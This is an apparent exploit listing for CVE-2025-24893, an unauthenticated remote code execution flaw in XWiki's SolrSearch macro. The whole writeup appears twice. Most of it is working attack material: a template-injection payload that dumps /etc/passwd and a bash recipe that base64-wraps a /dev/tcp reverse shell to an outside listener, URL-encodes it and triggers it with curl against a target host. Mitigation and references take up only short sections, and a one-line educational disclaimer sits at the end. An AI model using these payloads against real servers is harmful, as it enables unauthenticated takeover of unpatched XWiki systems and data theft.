9.8
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
# CVE-2025-24893 – Unauthenticated Remote Code Execution in XWiki
## 0 Table of Contents
1. [Summary](#1-summary)
2. [Vulnerability Details](#2-vulnerability-details)
3. [Affected Versions](#3-affected-versions)
4. [Proof-of-Concept](#5-proof-of-concept)
* 4.1 [Building the payload](#51-build-the-payload)
* 4.2 [Manual exploitation](#52-manual-exploitation)
* 4.3 [Automated python exploit](#53-automated-exploit)
5. [Mitigation](#6-mitigation)
6. [Credits & References](#7-credits--references)
---
## 1 Summary
* **CVE:** 2025-24893
* **Component:** `SolrSearch` macro (XWiki UI)
* **Severity:** 9.8 / CRITICAL (CVSS 3.1)
* **Attack vector:** Unauthenticated HTTP GET
* **Impact:** Arbitrary Groovy execution → system-level RCE (permissions of the Jetty/Tomcat user)
The `/xwiki/bin/get/Main/SolrSearch` endpoint concatenates untrusted `text=` input
straight into a Freemarker template.
By prematurely closing the template and opening a new `{{groovy}} … {{/groovy}}`
block, an attacker executes arbitrary Groovy code without authentication.
---
## 2 Vulnerability Details
```
GET /xwiki/bin/get/Main/SolrSearch?media=rss\&text=>> HTTP/1.1
````
`SolrSearch` should embed the supplied text as plain content, but the macro
handler **fails to escape `}}}`**, so the following happens:
1. `}}}` closes the current Freemarker block.
2. Attacker opens a **new macro**:
```xwiki
{{async async=false}}{{groovy}} … {{/groovy}}{{/async}}
```
* `async=false` forces synchronous execution (works even for guests).
3. Groovy runs with the permissions of the XWiki JVM process.
A minimal PoC that prints `/etc/passwd`:
```text
}}}{{async async=false}}{{groovy}}println("cat /etc/passwd".execute().text){{/groovy}}{{/async}}
```
URL-encoded variant (spaces → `%20`, braces → `%7B/%7D`, etc.):
```
%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d
```
---
## 3 Affected Versions
| Branch | Fixed in | Vulnerable ≤ |
| -------- | ------------------------------------------ | -------------------------------- |
| 15.x | **15.10.11** | 15.10.10 (and all 15.9 / 15.8 …) |
| 14.x LTS | **14.10.17** | 14.10.16 |
| 13 / 12 | **Not maintained** – all remain vulnerable | |
*(source: [OffSec advisory](https://www.offsec.com/blog/cve-2025-24893/) & XWiki
SEC-S 2025-02)*
---
## 5 Proof of Concept
### 5.1 Build the payload
```bash
RHOST="editor.htb:8080"
LHOST="10.10.14.8"
LPORT=4444
# 1. one-liner reverse shell
SHELL="bash -c 'bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1'"
# 2. Base64 (single line)
B64=$(echo -n "$SHELL" | base64 -w0)
# 3. wrap in Groovy macro
RAW='}}}{{async async=false}}{{groovy}}"bash -c {echo,'$B64'}|{base64,-d}|{bash,-i}".execute(){{/groovy}}{{/async}}'
# 4. URL-encode
PAYLOAD=$(python3 -c "import urllib.parse,sys;print(urllib.parse.quote(sys.argv[1],safe=''))" "$RAW")
```
### 5.2 Manual exploitation
```bash
# start listener
sudo ncat -lvnp 4444
# trigger exploit
curl "http://$RHOST/xwiki/bin/get/Main/SolrSearch?media=rss&text=${PAYLOAD}"
```
### 5.3 Automated exploit
`xwiki_solr_rce.py` ships in `exploit/` (see code block below).
```bash
python CVE-2025-24893.py -u -l -p
```
where
```
- URL including http:// or https://
```
*(pass `-c "id"` to run an arbitrary command instead of a shell)*
---
## 6 Mitigation
* **Upgrade** to **15.10.11** / **14.10.17** or later
* Temporary workaround: disable the macro
```properties
# /etc/xwiki/xwiki.properties
solr.search.enabled = false
```
---
## 7 Credits & References
* OffSec Research: “Unauth RCE in XWiki” – 20 Feb 2025
* NVD entry: [https://nvd.nist.gov/vuln/detail/CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893)
* [Exploit-DB #52136](https://www.exploit-db.com/exploits/52136)
> Research & PoC: **DeX1d**
---
>Disclaimer: For educational use only. Running this against systems you do not own is illegal.
## 0 Table of Contents
1. [Summary](#1-summary)
2. [Vulnerability Details](#2-vulnerability-details)
3. [Affected Versions](#3-affected-versions)
4. [Proof-of-Concept](#5-proof-of-concept)
* 4.1 [Building the payload](#51-build-the-payload)
* 4.2 [Manual exploitation](#52-manual-exploitation)
* 4.3 [Automated python exploit](#53-automated-exploit)
5. [Mitigation](#6-mitigation)
6. [Credits & References](#7-credits--references)
---
## 1 Summary
* **CVE:** 2025-24893
* **Component:** `SolrSearch` macro (XWiki UI)
* **Severity:** 9.8 / CRITICAL (CVSS 3.1)
* **Attack vector:** Unauthenticated HTTP GET
* **Impact:** Arbitrary Groovy execution → system-level RCE (permissions of the Jetty/Tomcat user)
The `/xwiki/bin/get/Main/SolrSearch` endpoint concatenates untrusted `text=` input
straight into a Freemarker template.
By prematurely closing the template and opening a new `{{groovy}} … {{/groovy}}`
block, an attacker executes arbitrary Groovy code without authentication.
---
## 2 Vulnerability Details
```
GET /xwiki/bin/get/Main/SolrSearch?media=rss\&text=>> HTTP/1.1
````
`SolrSearch` should embed the supplied text as plain content, but the macro
handler **fails to escape `}}}`**, so the following happens:
1. `}}}` closes the current Freemarker block.
2. Attacker opens a **new macro**:
```xwiki
{{async async=false}}{{groovy}} … {{/groovy}}{{/async}}
```
* `async=false` forces synchronous execution (works even for guests).
3. Groovy runs with the permissions of the XWiki JVM process.
A minimal PoC that prints `/etc/passwd`:
```text
}}}{{async async=false}}{{groovy}}println("cat /etc/passwd".execute().text){{/groovy}}{{/async}}
```
URL-encoded variant (spaces → `%20`, braces → `%7B/%7D`, etc.):
```
%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d
```
---
## 3 Affected Versions
| Branch | Fixed in | Vulnerable ≤ |
| -------- | ------------------------------------------ | -------------------------------- |
| 15.x | **15.10.11** | 15.10.10 (and all 15.9 / 15.8 …) |
| 14.x LTS | **14.10.17** | 14.10.16 |
| 13 / 12 | **Not maintained** – all remain vulnerable | |
*(source: [OffSec advisory](https://www.offsec.com/blog/cve-2025-24893/) & XWiki
SEC-S 2025-02)*
---
## 5 Proof of Concept
### 5.1 Build the payload
```bash
RHOST="editor.htb:8080"
LHOST="10.10.14.8"
LPORT=4444
# 1. one-liner reverse shell
SHELL="bash -c 'bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1'"
# 2. Base64 (single line)
B64=$(echo -n "$SHELL" | base64 -w0)
# 3. wrap in Groovy macro
RAW='}}}{{async async=false}}{{groovy}}"bash -c {echo,'$B64'}|{base64,-d}|{bash,-i}".execute(){{/groovy}}{{/async}}'
# 4. URL-encode
PAYLOAD=$(python3 -c "import urllib.parse,sys;print(urllib.parse.quote(sys.argv[1],safe=''))" "$RAW")
```
### 5.2 Manual exploitation
```bash
# start listener
sudo ncat -lvnp 4444
# trigger exploit
curl "http://$RHOST/xwiki/bin/get/Main/SolrSearch?media=rss&text=${PAYLOAD}"
```
### 5.3 Automated exploit
`xwiki_solr_rce.py` ships in `exploit/` (see code block below).
```bash
python CVE-2025-24893.py -u -l -p
```
where
```
- URL including http:// or https://
```
*(pass `-c "id"` to run an arbitrary command instead of a shell)*
---
## 6 Mitigation
* **Upgrade** to **15.10.11** / **14.10.17** or later
* Temporary workaround: disable the macro
```properties
# /etc/xwiki/xwiki.properties
solr.search.enabled = false
```
---
## 7 Credits & References
* OffSec Research: “Unauth RCE in XWiki” – 20 Feb 2025
* NVD entry: [https://nvd.nist.gov/vuln/detail/CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893)
* [Exploit-DB #52136](https://www.exploit-db.com/exploits/52136)
> Research & PoC: **DeX1d**
---
>Disclaimer: For educational use only. Running this against systems you do not own is illegal.
Basic Information
ID
3FC9E9A2-42CE-552A-A046-E205E2471000
Published
Aug 7, 2025 at 10:20
Modified
Aug 9, 2025 at 10:15